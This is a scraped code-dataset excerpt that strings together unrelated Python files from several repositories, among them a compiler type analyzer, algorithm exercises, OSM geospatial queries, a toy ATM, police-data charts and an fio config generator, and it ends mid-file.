Check iter <= Sequence>\n n = len(node.vars)\n t_iter = self.visit(node.iter)\n t_target = self.get_sequence_elt(node, t_iter, Sequence)\n t_vars = self.get_tuple_elts(node, t_target, n)\n for v, t in zip(node.vars, t_vars):\n self.update_store(v, t)\n self.visit(node.body)\n \n def visit_While(self, node):\n # Check test <= Bool\n t_test = self.visit(node.test)\n if not t_test.issmaller(Bool):\n self.mark_bad(node)\n self.visit(node.body)\n \n def visit_If(self, node):\n # Check test <= Bool\n t_test = self.visit(node.test)\n if not t_test.issmaller(Bool):\n self.mark_bad(node)\n self.visit(node.body)\n self.visit(node.orelse)\n \n # Use default handler for Pass, Break, Continue, and Expr.\n \n def visit_Assign(self, node):\n # target := value\n t_value = self.visit(node.value)\n self.update_store(node.target, t_value)\n \n def visit_DecompAssign(self, node):\n # If join(value, Tuple) ==\n # Tuple, n == len(vars):\n # vars_i := T_i for each i\n # Else:\n # vars_i := Top for each i\n #\n # Check value <= Tuple\n n = len(node.vars)\n t_value = self.visit(node.value)\n t_vars = self.get_tuple_elts(node, t_value, n)\n for v, t in zip(node.vars, t_vars):\n self.update_store(v, t)\n \n def visit_SetUpdate(self, node):\n # target := Set\n # Check target <= Set\n t_value = self.visit(node.value)\n t_target = self.visit(node.target, type=Set(t_value))\n if not t_target.issmaller(Set(Top)):\n self.mark_bad(node)\n \n def visit_SetBulkUpdate(self, node):\n # If join(value, Set) == Set:\n # target := Set\n # Else:\n # target := Set\n #\n # Check value <= Set and target <= Set\n t_value = self.visit(node.value)\n t_elt = self.get_sequence_elt(node, t_value, Set)\n t_target = self.visit(node.target, type=Set(t_elt))\n if not (t_value.issmaller(Set(Top)) and\n t_target.issmaller(Set(Top))):\n self.mark_bad(node)\n \n def visit_SetClear(self, node):\n # target := Set\n # Check target <= Set\n t_target = self.visit(node.target, type=Set(Bottom))\n if not t_target.issmaller(Set(Top)):\n self.mark_bad(node)\n \n def visit_RelUpdate(self, node):\n # rel := Set\n # Check rel <= Set\n t_value = self.get_store(node.elem)\n t_rel = self.update_store(node.rel, Set(t_value))\n if not t_rel.issmaller(Set(Top)):\n self.mark_bad(node)\n \n def visit_RelClear(self, node):\n # rel := Set\n # Check rel <= Set\n t_rel = self.update_store(node.rel, Set(Bottom))\n if not t_rel.issmaller(Set(Top)):\n self.mark_bad(node)\n \n def visit_DictAssign(self, node):\n # target := Map\n # Check target <= Map\n t_key = self.visit(node.key)\n t_value = self.visit(node.value)\n t_target = self.visit(node.target, type=Map(t_key, t_value))\n if not t_target.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n def visit_DictDelete(self, node):\n # target := Map\n # Check target <= Map\n t_key = self.visit(node.key)\n t_target = self.visit(node.target, type=Map(t_key, Bottom))\n if not t_target.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n def visit_DictClear(self, node):\n # target := Map\n # Check target <= Map\n t_target = self.visit(node.target, type=Map(Bottom, Bottom))\n if not t_target.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n def visit_MapAssign(self, node):\n # map := Map\n # Check map <= Map\n t_key = self.get_store(node.key)\n t_value = self.get_store(node.value)\n t_map = self.update_store(node.map, Map(t_key, t_value))\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n def visit_MapDelete(self, node):\n # map := Map\n # Check map <= Map\n t_key = self.get_store(node.key)\n t_map = self.update_store(node.map, Map(t_key, Bottom))\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n def visit_MapClear(self, node):\n # target := Map\n # Check target <= Map\n t_map = self.update_store(node.map, Map(Bottom, Bottom))\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n \n # Attribute handlers not implemented:\n # visit_AttrAssign\n # visit_AttrDelete \n \n @readonly\n def visit_UnaryOp(self, node, *, type=None):\n # If op == Not:\n # Return Bool\n # Check operand <= Bool\n # Else:\n # Return Number\n # Check operand <= Number\n t_operand = self.visit(node.operand)\n if isinstance(node.op, L.Not):\n t = Bool\n else:\n t = Number\n if not t_operand.issmaller(t):\n self.mark_bad(node)\n return t\n \n @readonly\n def visit_BoolOp(self, node, *, type=None):\n # Return Bool\n # Check v <= Bool for v in values\n t_values = [self.visit(v) for v in node.values]\n if not all(t.issmaller(Bool) for t in t_values):\n self.mark_bad(node)\n return Bool\n \n @readonly\n def visit_BinOp(self, node, *, type=None):\n # Return join(left, right)\n t_left = self.visit(node.left)\n t_right = self.visit(node.right)\n return t_left.join(t_right)\n \n @readonly\n def visit_Compare(self, node, *, type=None):\n # Return Bool.\n self.visit(node.left)\n self.visit(node.right)\n return Bool\n \n @readonly\n def visit_IfExp(self, node, *, type=None):\n # Return join(body, orelse)\n # Check test <= Bool\n t_test = self.visit(node.test)\n t_body = self.visit(node.body)\n t_orelse = self.visit(node.orelse)\n if not t_test.issmaller(Bool):\n self.mark_bad(node)\n return t_body.join(t_orelse)\n \n @readonly\n def visit_GeneralCall(self, node, *, type=None):\n # Return Top\n self.generic_visit(node)\n return Top\n \n @readonly\n def visit_Call(self, node, *, type=None):\n checker = FunctionTypeChecker()\n t_args = [self.visit(a) for a in node.args]\n t_result = checker.get_call_type(node, t_args)\n if t_result is None:\n self.mark_bad(node)\n return Top\n return t_result\n \n @readonly\n def visit_Num(self, node, *, type=None):\n # Return Number\n return Number\n \n @readonly\n def visit_Str(self, node, *, type=None):\n # Return String\n return String\n \n @readonly\n def visit_NameConstant(self, node, *, type=None):\n # For True/False:\n # Return Bool\n # For None:\n # Return Top\n if node.value in [True, False]:\n return Bool\n elif node.value is None:\n return Top\n else:\n assert()\n \n def visit_Name(self, node, *, type=None):\n # Read or update the type in the store, depending on\n # whether we're in read or write context.\n name = node.id\n if type is None:\n return self.get_store(name)\n else:\n return self.update_store(name, type)\n \n @readonly\n def visit_List(self, node, *, type=None):\n # Return List\n t_elts = [self.visit(e) for e in node.elts]\n t_elt = Bottom.join(*t_elts)\n return List(t_elt)\n \n @readonly\n def visit_Set(self, node, *, type=None):\n # Return Set\n t_elts = [self.visit(e) for e in node.elts]\n t_elt = Bottom.join(*t_elts)\n return Set(t_elt)\n \n @readonly\n def visit_Tuple(self, node, *, type=None):\n # Return Tuple\n t_elts = [self.visit(e) for e in node.elts]\n return Tuple(t_elts)\n \n # TODO: More precise behavior requires adding objects to the\n # type algebra.\n \n visit_Attribute = default_expr_handler\n \n @readonly\n def visit_Subscript(self, node, *, type=None):\n # If value == Bottom:\n # Return Bottom\n # Elif value == Tuple:\n # If index == Num(k) node, 0 <= k <= n:\n # Return Tk\n # Else:\n # Return join(T0, ..., Tn)\n # Elif join(value, List) == List:\n # Return T\n # Else:\n # Return Top\n #\n # Check value <= List or value is a Tuple\n # Check index <= Number\n t_value = self.visit(node.value)\n t_index = self.visit(node.index)\n if not t_index.issmaller(Number):\n self.mark_bad(node)\n \n # Try Tuple case first. Since we don't have a type for tuples\n # of arbitrary arity, we'll use an isinstance() check. This\n # may have to change if we add new subtypes of Tuple to the\n # lattice.\n if isinstance(t_value, Tuple):\n if (isinstance(node.index, L.Num) and\n 0 <= node.index.n < len(t_value.elts)):\n return t_value.elts[node.index.n]\n else:\n return Bottom.join(*t_value.elts)\n \n # Otherwise, treat it as a list or list subtype.\n return self.get_sequence_elt(node, t_value, List)\n \n def visit_DictLookup(self, node, *, type=None):\n # If type != None:\n # value := Map\n #\n # If join(value, Map) == Map:\n # R = V\n # Else:\n # R = Top\n # Return join(R, default)\n #\n # Check value <= Map\n t_value = Map(Bottom, type) if type is not None else None\n t_value = self.visit(node.value, type=t_value)\n t_default = (self.visit(node.default)\n if node.default is not None else None)\n t_value = t_value.join(Map(Bottom, Bottom))\n if not t_value.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n return Top\n return t_value.value.join(t_default)\n \n visit_FirstThen = default_expr_handler\n \n @readonly\n def visit_ImgLookup(self, node, *, type=None):\n # Check rel <= Set\n # Return Set\n t_rel = self.visit(node.set)\n if not t_rel.issmaller(Set(Top)):\n self.mark_bad(node)\n return Top\n return Set(Top)\n \n @readonly\n def visit_SetFromMap(self, node, *, type=None):\n # Check map <= Map\n # Return Set\n t_map = self.visit(node.map)\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n return Top\n return Set(Top)\n \n visit_Unwrap = default_expr_handler\n visit_Wrap = default_expr_handler\n \n visit_IsSet = default_expr_handler\n visit_HasField = default_expr_handler\n visit_IsMap = default_expr_handler\n visit_HasArity = default_expr_handler\n \n @readonly\n def visit_Query(self, node, *, type=None):\n # Return query\n return self.visit(node.query)\n \n @readonly\n def visit_Comp(self, node, *, type=None):\n # Return Set\n for cl in node.clauses:\n self.visit(cl)\n t_resexp = self.visit(node.resexp)\n return Set(t_resexp)\n \n @readonly\n def visit_Member(self, node, *, type=None):\n # If join(iter, Set) == Set:\n # target := T\n # Else:\n # target := Top\n #\n # Check iter <= Set\n t_iter = self.visit(node.iter)\n t_target = self.get_sequence_elt(node, t_iter, Set)\n self.visit(node.target, type=t_target)\n \n @readonly\n def visit_RelMember(self, node, *, type=None):\n # If join(rel, Set>) ==\n # Set>, n == len(vars):\n # vars_i := T_i for each i\n # Else:\n # vars_i := Top for each i\n #\n # Check rel <= Set>\n n = len(node.vars)\n t_rel = self.get_store(node.rel)\n t_target = self.get_sequence_elt(node, t_rel, Set)\n t_vars = self.get_tuple_elts(node, t_target, n)\n for v, t in zip(node.vars, t_vars):\n self.update_store(v, t)\n \n @readonly\n def visit_SingMember(self, node, *, type=None):\n # If join(value, Tuple) ==\n # Tuple, n == len(vars):\n # vars_i := T_i for each i\n # Else:\n # vars_i := Top for each i\n #\n # Check value <= Tuple\n n = len(node.vars)\n t_value = self.visit(node.value)\n t_vars = self.get_tuple_elts(node, t_value, n)\n for v, t in zip(node.vars, t_vars):\n self.update_store(v, t)\n \n @readonly\n def visit_WithoutMember(self, node, *, type=None):\n # We don't have an easy way to propagate information into\n # the nested clause, or else we'd flow type information from\n # value to cl.target. Could fix by using the type parameter,\n # with the convention that for membership clauses, type is the\n # type of the element.\n self.generic_visit(node)\n \n @readonly\n def visit_VarsMember(self, node, *, type=None):\n # If join(iter, Set>) ==\n # Set>, n == len(vars):\n # vars_i := T_i for each i\n # Else:\n # vars_i := Top for each i\n #\n # Check iter <= Set>\n n = len(node.vars)\n t_iter = self.visit(node.iter)\n t_target = self.get_sequence_elt(node, t_iter, Set)\n t_vars = self.get_tuple_elts(node, t_target, n)\n for v, t in zip(node.vars, t_vars):\n self.update_store(v, t)\n \n @readonly\n def visit_SetFromMapMember(self, node, *, type=None):\n # If join(rel, Set ==\n # Set> and\n # join(map, Map, Bottom> ==\n # Map, Un>, n == len(vars):\n # vars_i := join(T_i, U_i) for each i\n # Else:\n # vars_i := Top for each i\n #\n # Check map <= Map, Bottom>\n # Check rel <= Set\n n = len(node.vars)\n t_rel = self.get_store(node.rel)\n t_relelt = self.get_sequence_elt(node, t_rel, Set)\n t_relvars = self.get_tuple_elts(node, t_relelt, n)\n t_map = self.get_store(node.map)\n t_key, t_value = self.get_map_keyval(node, t_map)\n t_keyvars = self.get_tuple_elts(node, t_key, n - 1)\n t_mapvars = list(t_keyvars) + [t_value]\n for v, t, u in zip(node.vars, t_relvars, t_mapvars):\n self.update_store(v, t.join(u))\n \n # Object domain clauses not implemented:\n # MMember\n # FMember\n # MAPMember\n # TUPMember\n \n @readonly\n def visit_Cond(self, node, *, type=None):\n self.visit(node.cond)\n \n def aggrop_helper(self, node, op, t_elt):\n # If op is count or op is sum:\n # Check t_elt <= Number\n # Return Number\n # Elif op is min or op is max:\n # Return t_elt\n if isinstance(node.op, (L.Count, L.Sum)):\n if not t_elt.issmaller(Number):\n self.mark_bad(node)\n return Top\n return Number\n elif isinstance(node.op, (L.Min, L.Max)):\n return t_elt\n else:\n assert()\n \n @readonly\n def visit_Aggr(self, node, *, type=None):\n # If join(value, Set) == Set:\n # Return aggrop_helper(op, T)\n # Else:\n # Return Top\n # Check value <= Set\n t_value = self.visit(node.value)\n t_elt = self.get_sequence_elt(node, t_value, Set)\n return self.aggrop_helper(node, node.op, t_elt)\n \n @readonly\n def visit_AggrRestr(self, node, *, type=None):\n # As for Aggr, except we have the additional condition:\n #\n # Check restr <= Set> of arity |params|\n t_value = self.visit(node.value)\n t_elt = self.get_sequence_elt(node, t_value, Set)\n t = self.aggrop_helper(node, node.op, t_elt)\n \n n = len(node.params)\n t_restr = self.visit(node.restr)\n if not t_restr.issmaller(Set(Tuple([Top] * n))):\n self.mark_bad(node)\n \n return t\n \n # Remaining nodes require no handler.\n\n\ndef analyze_types(tree, store, fixed_vars=None):\n \"\"\"Given a mapping from variable identifiers to types, return a\n modified version of the store that expands types according to the\n requirements of the program. Also return an OrderedSet of nodes\n where well-typedness is violated. Each type may only increase, not\n decrease. Variables not appearing in the store mapping are assumed\n to be Bottom.\n \"\"\"\n store = dict(store)\n \n height_limit = 5\n limit = 20\n steps = 0\n analyzer = TypeAnalysisStepper(store, height_limit, unknown=Bottom,\n fixed_vars=fixed_vars)\n while analyzer.changed:\n if steps == limit:\n print('Warning: Type analysis did not converge after '\n '{} steps'.format(limit))\n break\n store = analyzer.process(tree)\n steps += 1\n \n return store, analyzer.illtyped\n\n\ndef analyze_expr_type(tree, store):\n \"\"\"Given an expression node, return its type evaluation under the\n given type store.\n \"\"\"\n store = dict(store)\n height_limit = 5\n \n # Bypass TypeAnalysisStepper's process() method since it discards\n # type info. The given tree should not be a statement node.\n class Analyzer(TypeAnalysisStepper):\n process = L.AdvNodeVisitor.process\n \n type = Analyzer.run(tree, store, height_limit, unknown=Top)\n return type\n","repo_name":"jaz888/dist_lang_reviews","sub_path":"incoq/compiler/type/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":28626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28222906495","text":"# 비트연산\narr = [1, 2, 3, 4, 5]\n\nn = len(arr)\n\nfor i in range(1< 1,\n# for i in range(1< 30:\n if m == 45:\n print (d[45], \"to one\")\n elif m == 59:\n print (d[1], \"minute to one\")\n else: \n print (d[60-m], \"minutes to one\")\nelif m <= 30:\n if m == 0:\n print (d[h], \"o' clock\")\n elif m == 1:\n print (d[m], \"minute past one\")\n elif m == 15 or m == 30:\n print (d[m], \"past\", d[h])\n else: \n print (d[m], \"minutes past\", d[h])\nelif m > 30:\n if m == 59:\n print (d[1], \"minute to\", d[h+1])\n elif m == 45:\n print (d[45], \"to\", d[h+1]) \n else:\n print (d[60-m], \"minutes to\", d[h+1])\n","repo_name":"gauthamkrishna-g/HackerRank","sub_path":"Algorithms/Implementation/The_Time_in_Words.py","file_name":"The_Time_in_Words.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"42389592511","text":"from geoalchemy2 import WKTElement\nfrom sqlalchemy import func, literal, Sequence\n\nfrom data_models.common_db import session, engine\nfrom data_models.grid_model import *\nfrom data_models.osm_model import *\nfrom data_models.geo_feature_model import *\nfrom utils import create_table\n\n\ndef crop_osm(osm_table, bounding_box):\n\n if bounding_box is not None:\n return session.query(osm_table.wkb_geometry, osm_table.fclass) \\\n .filter(func.ST_Intersects(osm_table.wkb_geometry, bounding_box)) \\\n .filter(osm_table.fclass is not None).subquery()\n else:\n return session.query(osm_table.wkb_geometry, osm_table.fclass) \\\n .filter(osm_table.fclass is not None).subquery()\n\n\ndef compute_features_from_osm(config):\n\n osm_tables = config['OSM']\n bounding_box = WKTElement(config['BOUNDING_BOX'], srid=4326)\n grid_obj = config['GRID_OBJ']\n geo_feature_obj = config['GEO_FEATURE_OBJ']\n\n try:\n for feature_name, osm_table in osm_tables.items():\n geo_feature_type = osm_table.wkb_geometry.type.geometry_type\n cropped_osm = crop_osm(osm_table, bounding_box) # crop the OSM data with a bounding box\n\n sub_query = session.query(grid_obj.gid, cropped_osm.c.fclass,\n func.ST_GeogFromWKB(\n func.ST_Intersection(grid_obj.geom, cropped_osm.c.wkb_geometry))\n .label('intersection')) \\\n .filter(func.ST_Intersects(grid_obj.geom, cropped_osm.c.wkb_geometry)).subquery()\n\n results = []\n if geo_feature_type == 'MULTIPOLYGON':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.SUM(func.ST_AREA(sub_query.c.intersection)).label('value'),\n literal('area').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n elif geo_feature_type == 'MULTILINESTRING':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.SUM(func.ST_LENGTH(sub_query.c.intersection)).label('value'),\n literal('length').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n elif geo_feature_type == 'POINT':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.COUNT(sub_query.c.intersection).label('value'),\n literal('count').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n else:\n pass\n\n obj_results = []\n for res in results:\n obj_results.append(geo_feature_obj(gid=res[0], feature_type=res[1], geo_feature=res[2],\n value=res[3], measurement=res[4]))\n # session.add_all(obj_results)\n # session.commit()\n print('{} has finished'.format(feature_name))\n\n return\n\n except Exception as e:\n print(e)\n exit(-1)\n\n\nif __name__ == '__main__':\n\n LOS_ANGELES = {\n 'AREA': 'los_angeles',\n 'OSM': {\n 'landuse_a': CaliforniaOsmLanduseA,\n 'natural': CaliforniaOsmNatural,\n 'natural_a': CaliforniaOsmNaturalA,\n 'places': CaliforniaOsmPlaces,\n 'places_a': CaliforniaOsmPlacesA,\n 'pois': CaliforniaOsmPois,\n 'pois_a': CaliforniaOsmPoisA,\n 'pofw': CaliforniaOsmPofw,\n 'pofw_a': CaliforniaOsmPofwA,\n 'railways': CaliforniaOsmRailways,\n 'roads': CaliforniaOsmRoads,\n 'traffic': CaliforniaOsmTraffic,\n 'traffic_a': CaliforniaOsmTrafficA,\n 'transport': CaliforniaOsmTransport,\n 'transport_a': CaliforniaOsmTransportA,\n 'water_a': CaliforniaOsmWaterA,\n 'waterways': CaliforniaOsmWaterway\n },\n 'BOUNDING_BOX': 'POLYGON((-118.5246 33.7322, -118.5246 34.1455, -118.1158 34.1455, -118.1158 33.7322, '\n '-118.5246 33.7322))',\n 500: {\n 'GRID_OBJ': LosAngeles500mGrid,\n 'GEO_FEATURE_OBJ': LosAngeles500mGridGeoFeature,\n },\n 1000: {\n 'GRID_OBJ': LosAngeles1000mGrid,\n 'GEO_FEATURE_OBJ': LosAngeles1000mGridGeoFeature,\n }\n }\n\n target = LOS_ANGELES\n conf = target[1000]\n conf['OSM'] = target['OSM']\n conf['BOUNDING_BOX'] = target['BOUNDING_BOX']\n\n \"\"\" !!! Be careful, create table would overwrite the original table \"\"\"\n # create_table(conf['GEO_FEATURE_OBJ'])\n compute_features_from_osm(conf)\n","repo_name":"linyijun/prisms-data-preprocessing","sub_path":"gen_geo_features.py","file_name":"gen_geo_features.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"8794510620","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(formatter={'float': '{: 0.3f}'.format},linewidth=10000)\n\nmnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0 #floats\ny_train, y_test = tf.keras.utils.to_categorical(y_train), tf.keras.utils.to_categorical(y_test)\n\nclassifier = tf.keras.models.load_model(\"classifier.h5\")\ndrawer = tf.keras.models.load_model(\"drawer.h5\")\n\ndrawer_x_train = classifier.predict(x_train)\ndrawer_x_test = classifier.predict(x_test)\n\ni=10\nprediction = drawer.predict(np.array([[0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1]]))\nplt.imshow(prediction[0],cmap=\"gray_r\")\nplt.show()\n# plt.imshow(x_test[i],cmap=\"gray_r\")\n# plt.show()\n","repo_name":"Eviper01/DeepLearning","sub_path":"mnist_draw/model.test.py","file_name":"model.test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71614431615","text":"numbers = (1, 2, 3, 4, 5)\n\n\n# print(numbers, sep=';')\n# print(*numbers, sep=';')\n# print(1, 2, 3, 4, 5, sep=';')\n\n\ndef test_stars(*args):\n print(args)\n for x in args:\n print(x)\n\n\ntest_stars(0, 1, 2, 3, 4, 5)\n\nprint()\n\ntest_stars()\n\n","repo_name":"deskavaenkelt/EcUtbildningDevOps","sub_path":"Linux and Script Languages/Python/Self Studies/FunctionsIntro/star_examples.py","file_name":"star_examples.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3079882595","text":"# Author:houyafan\nimport os, sys, json,time\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nfrom core.modifyDeposit.modifyDeposit import *\nfrom core.data.CONST import BASE_PATH, DATA_PATH\nfrom core.tools.check import *\nfrom core.tools.public_file import *\n\n# 还款\n@public\ndef returnPrice():\n returnMoney = input(\"请输入还款金额:\")\n new_returnMoney = check_int(returnMoney)\n with open(DATA_PATH + \"card_message_tmp.json\", \"r+\")as f:\n data = json.load(f)\n username=get_username()\n creditmax = data[username][\"message\"][\"CreditMax\"] # 信用卡剩余额度\n original = data[username][\"message\"][\"Original\"] # 信用卡额度\n balance = data[username][\"message\"][\"Balance\"] # 余额\n owed = original - creditmax # 欠款\n if creditmax == original: # 不欠款直接增加余额\n data[username][\"message\"][\"Balance\"] = balance+new_returnMoney\n write_file(f, data) # 写入返款\n write_return_bill(new_returnMoney) # 写入账单\n elif new_returnMoney == owed: # 还款等于欠款\n data[username][\"message\"][\"CreditMax\"] = original\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n elif new_returnMoney > owed: # 还款大于欠款\n data[username][\"message\"][\"CreditMax\"] = original\n data[username][\"message\"][\"Balance\"] = balance + new_returnMoney - owed\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n elif new_returnMoney < owed: # 还款数小于欠款数\n if balance + new_returnMoney > owed: # 余额+还款数>欠款\n data[username][\"message\"][\"CreditMax\"] = original\n data[username][\"message\"][\"Balance\"] = balance + new_returnMoney - owed\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n elif balance + new_returnMoney < owed: # 余额+还款数<欠款\n data[username][\"message\"][\"Balance\"] = 0\n data[username][\"message\"][\"CreditMax\"] = original - owed + balance + new_returnMoney\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n elif balance + new_returnMoney == owed: # 余额+还款数=欠款\n data[username][\"message\"][\"Balance\"] = 0\n data[username][\"message\"][\"CreditMax\"] = original\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n elif balance == 0: # 没有余额\n data[username][\"message\"][\"CreditMax\"] = new_returnMoney\n write_file(f, data)\n write_return_bill(new_returnMoney) # 写入账单\n\n\n# 写入账单\ndef write_return_bill(new_returnMoney):\n with open(DATA_PATH+'bill.json', 'a+') as f:\n f.seek(0)\n data=json.load(f)\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n info='''%s 还款 %s 元''' % (new_time,new_returnMoney)\n public_write(f, info, data)\n\n\n\n","repo_name":"huamingao/homework","sub_path":"day4/ATM优秀作业/stu170141/day_4_homework/Atm/core/returnDeposit/returnPrice.py","file_name":"returnPrice.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38696222443","text":"from tkinter import messagebox\nimport pandas as pd\nfrom police_stop_search.fetch_request import return_stop_and_search_cases\nfrom utils.get_month_as_dict import months_of_the_year\nimport numpy as np\nfrom chart_functions import horizontal_lollipop_chart, bar_chart_, scattered_plot, pie_chart, donut_chart\n \n\ndef get_stop_search_cases(selected_month, selected_year, selected_police_force):\n date = selected_year + \"-\" + months_of_the_year()[selected_month]\n # this function returns a dictionary with a length of two\n result = return_stop_and_search_cases(selected_police_force, date)[\"data\"]\n if result == []:\n return messagebox.showinfo(\"showinfo\", \"There is no data for this month selected\")\n else: \n return result\n \ndef plot_self_defined_ethnicity(selected_month, selected_year, police_force_selected):\n df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, police_force_selected))\n outcome = df.groupby(['self_defined_ethnicity'], as_index=False).count()\n graph_title = \"Stop and search cases of self defined ethnicity for \" + police_force_selected + \" in \" + selected_month + \", \" + selected_year\n bar_chart_(graph_title, outcome, outcome[\"involved_person\"], outcome[\"self_defined_ethnicity\"] )\n\ndef plot_legislation_outcome(selected_month, selected_year, selected_police_force):\n df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, selected_police_force))\n outcome = df.groupby(['legislation'], as_index=False).count()\n title = \"Stop and search cases by legislation \\n for \" + selected_police_force + \" in \" + selected_month + \", \" + selected_year\n if len(outcome[\"involved_person\"]) == 3:\n colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\"])\n elif len(outcome[\"involved_person\"]) == 3:\n colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\", \"#E6CCB2\"])\n elif len(outcome[\"involved_person\"]) == 5:\n colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\", \"#E6CCB2\", \"#9B2226\"])\n \n scattered_plot(title, outcome[\"legislation\"], outcome[\"involved_person\"], colors)\n \ndef plot_stop_and_search_by_type(selected_month, selected_year, police_force_selected):\n df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, police_force_selected))\n outcome = df.groupby([\"type\"], as_index=False)[[\"involved_person\"]].count()\n chart_title = \"Stop and Search Cases Breakdown by Ethnicity \\nfor \" + police_force_selected + \" in \" + selected_month + \", \" + selected_year\n pie_chart(chart_title, outcome[\"involved_person\"], outcome[\"type\"])\n \n \ndef plot_stop_search_by_age_range_resulting_in_arrest(Month, Year, SelectedPoliceForce):\n df = pd.DataFrame.from_dict(get_stop_search_cases(Month, Year, SelectedPoliceForce))\n df = df.loc[df['outcome'] == \"Arrest\"]\n df = df.reset_index()\n outcome = df.groupby([\"age_range\"], as_index=False)[[\"involved_person\"]].count()\n title = \"Stop and search cases by age range that resulted in arrest for \\n \" + SelectedPoliceForce + \" in \" + Month + \", \" + Year\n maximum_value=outcome.max()\n # determine the max value in the data\n maximum = maximum_value['involved_person'] \n \n horizontal_lollipop_chart(outcome.index, outcome[\"involved_person\"], outcome[\"age_range\"], maximum, graph_title=title, data=outcome)\n ","repo_name":"victorodoh/information-request-tool","sub_path":"police_stop_search/functions_for_form.py","file_name":"functions_for_form.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5645429745","text":"from collections import deque\ndef getSubArrCount(arr, k):\n length = len(arr)\n count = 0\n for i in range(length-1):\n for j in range(i+1, length):\n tempArr = arr[i:j+1]\n # print(tempArr)\n max, min = getMaxMin(tempArr)\n if max-min > k:\n count += 1\n print(count)\n\n\ndef getMaxMin(arr):\n length = len(arr)\n # subArr = []\n max = arr[0]\n min = arr[0]\n for i in range(1,length):\n if arr[i] > max:\n max = arr[i]\n if arr[i] < min:\n min = arr[i]\n return max, min\n\n# def subArrDeque(arr, k ):\n# count = 0\n# length = len(arr)\n# qmax = deque()\n# qmin = deque()\n# for i in range(length):\n# for j in range(0, length):\n# print(str(i)+\"->\"+str(j))\n# while qmax and arr[qmax[-1]] < arr[j]:\n# qmax.pop()\n# while qmin and arr[qmin[-1]] > arr[j]:\n# qmin.pop()\n# qmax.append(j)\n# qmin.append(j)\n# if arr[qmax[0]] - arr[qmin[0]] <= k:\n# break\n# if i == qmax[0]:\n# qmax.popleft()\n# if i == qmin[0]:\n# qmin.popleft()\n# count += j - i\n# print(count)\n\n\nif __name__ == '__main__':\n # arr = [int(x) for x in input().split(\" \")]\n # k = int(input())\n arr = [3, 6, 4, 3, 2]\n k = 2\n # subArrDeque(arr,k)\n getSubArrCount(arr, k)\n\n # print(getMaxMin(arr))\n\n","repo_name":"TcMysunshine/AdvanceAlgorithms","sub_path":"PythonAA/First/subArr.py","file_name":"subArr.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1920465702","text":"#!/usr/bin/env python3\n\nimport cpupol\nimport os\n\nmethods = [\"read\", \"write\"]\n\nCUR_DIR = os.path.abspath(os.path.dirname(__file__))\nODINFS_DIR = os.path.join(CUR_DIR, \"config_odinfs\")\nDELEGATION_THREADS=12\n\ndef get_ncores():\n\n ncores = []\n for socket in range(1, cpupol.PHYSICAL_CHIPS + 1):\n if socket == 1:\n n = 0\n while (2 ** n) < cpupol.CORE_PER_CHIP:\n ncores.append((2 ** n))\n n += 1\n ncores.append(socket * (cpupol.CORE_PER_CHIP))\n else:\n ncores.append(socket * (cpupol.CORE_PER_CHIP))\n\n ncores.sort()\n return ncores\n\ndef gen_odinfs_cpus_allowed():\n ret=\"cpus_allowed=\"\n for i in range(1, cpupol.PHYSICAL_CHIPS + 1):\n start = cpupol.CORE_PER_CHIP * (i - 1) + DELEGATION_THREADS \n end = cpupol.CORE_PER_CHIP * i - 